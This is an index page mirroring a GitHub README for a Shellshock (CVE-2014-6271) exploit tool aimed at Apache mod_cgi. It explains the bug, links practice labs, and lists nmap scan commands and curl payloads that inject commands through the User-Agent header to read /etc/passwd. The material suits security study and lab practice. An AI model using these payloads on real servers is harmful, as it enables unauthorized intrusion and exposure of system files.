Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/jsmoreira02/cve-2014-6271
Exploitation of "Shellshock" Vulnerability. Remote code execution in Apache with mod_cgi
https://github.com/jsmoreira02/cve-2014-6271
cve-2014-6271 exploit hacking python3 reverse-shell shellshock-vulnerability web-exploitation
Last synced: 23 days ago
JSON representation
Exploitation of "Shellshock" Vulnerability. Remote code execution in Apache with mod_cgi
- Host: GitHub
- URL: https://github.com/jsmoreira02/cve-2014-6271
- Owner: Jsmoreira02
- Created: 2023-07-01T03:50:02.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2024-09-22T08:52:09.000Z (5 months ago)
- Last Synced: 2024-11-18T02:22:03.798Z (3 months ago)
- Topics: cve-2014-6271, exploit, hacking, python3, reverse-shell, shellshock-vulnerability, web-exploitation
- Language: Python
- Homepage:
- Size: 30.3 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
![]()
![]()
![]()
![]()
![]()
![]()
# Shellshock Exploitation (CVE-2014-6271)
Shellshock is effectively a Remote Command Execution vulnerability in BASH. This script exploits the vulnerability in the web environment on apache or similar with mod_cgi enabled. The vulnerability lies in the manipulation of environment variables, which are dynamic named values that impact how processes run on a computer. Attackers can exploit this by attaching malicious code to environment variables, which is executed upon receiving the variable. This allows attackers to potentially compromise the system.
### Lab for vulnerability testing
- [PentesterLab](https://www.vulnhub.com/entry/pentester-lab-cve-2014-6271-shellshock,104/)
- [VulnHub](https://www.vulnhub.com/entry/sumo-1,480/)
- [TryHackMe](https://tryhackme.com/room/0day)![Vídeo2](https://github.com/Jsmoreira02/CVE-2014-6271/assets/103542430/b9da536f-2cbe-4c47-9ea1-bfbc07f610f2)
#
#### Find CGI-BIN pages:
```bash
$ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
$ nmap -sV -p- --script http-shellshock 192.168.x.x
$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x
```#### Manual test:
```bash
sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd"
sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;"
```# Warning:
> I am not responsible for any illegal use or damage caused by this tool. It was written for fun, not evil and is intended to raise awareness about hacking and cybersecurity***Good Hacking :)***